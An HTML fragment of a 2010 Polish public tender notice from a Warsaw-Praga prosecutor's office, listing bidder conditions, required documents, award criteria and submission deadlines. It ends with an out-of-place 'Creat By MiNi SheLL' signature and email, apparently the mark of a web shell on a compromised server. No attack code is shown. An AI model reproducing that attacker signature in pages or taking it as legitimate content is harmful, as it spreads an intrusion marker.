b) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 uPzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 uPzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium, bo zostali wykluczeni z postępowania (lub ich oferty odrzucono), jeżeli w wyniku ostatecznego rozstrzygnięcia unieważniono czynność ich wykluczenia (lub odrzucenia ich ofert).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunki udziału w postępowaniu, o których mowa w pkt. 1 niniejszego Rozdziału, na podstawie złożonego wraz z ofertą oświadczenia i dokumentów o spełnieniu warunków udziału w postępowaniu, o których mowa w pkt. 1 Rozdziału 9 SIWZ na zasadzie: Wykonawca /spełnia/ albo /nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać wykonanie w okresie ostatnich trzech lat co najmniej dwóch tożsamych usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>g)  	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne, konsorcja) - pełnomocnictwo wyznaczające pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego (jeżeli wykonawca jest w takiej sytuacji); w pozostałych przypadkach - jeżeli pełnomocnictwo jest stosowane. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
Dowód wniesienia wadium.
Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu do oferty należy dołączyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - oryginał lub kopia dokumentu/dokumentów poświadczona za zgodność z oryginałem przez osobę/osoby uprawnioną/uprawnione do reprezentowania  wykonawcy.
Zamawiający przewiduje możliwość zmiany przez Wykonawcę w zakresie ww. innego podmiotu w trakcie realizacji zamówienia pod warunkiem, że wskazany przez Wykonawcę nowy inny podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy inny podmiot.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Czas reakcji na usterki i awarie - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w trakcie jej trwania z uwagi na urzędową zmianę stawki VAT na przedmiot umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warszawapraga.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PROKURATURA OKRĘGOWA WARSZAWA-PRAGA W WARSZAWIE
ul. Bródnowska 13/15  
03-439 Warszawa 
pokój 219, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2010 godzina 12:00, miejsce: PROKURATURA OKRĘGOWA WARSZAWA-PRAGA W WARSZAWIE
ul. Bródnowska 13/15  
03-439 Warszawa 
pokój 201, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com